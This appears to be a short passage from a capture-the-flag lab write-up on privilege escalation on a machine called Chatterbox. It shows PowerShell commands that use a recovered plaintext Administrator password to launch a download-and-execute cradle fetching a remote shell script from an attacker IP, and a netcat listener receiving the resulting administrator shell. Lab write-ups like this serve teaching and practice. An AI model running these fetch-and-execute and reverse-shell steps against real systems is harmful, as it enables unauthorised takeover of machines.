5 privesc autologon creds

PS> $password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.161/shell2.ps1')" -Credential $cred

$ rlwrap nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.74] 49178

Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

whoami
chatterbox\administrator

Last updated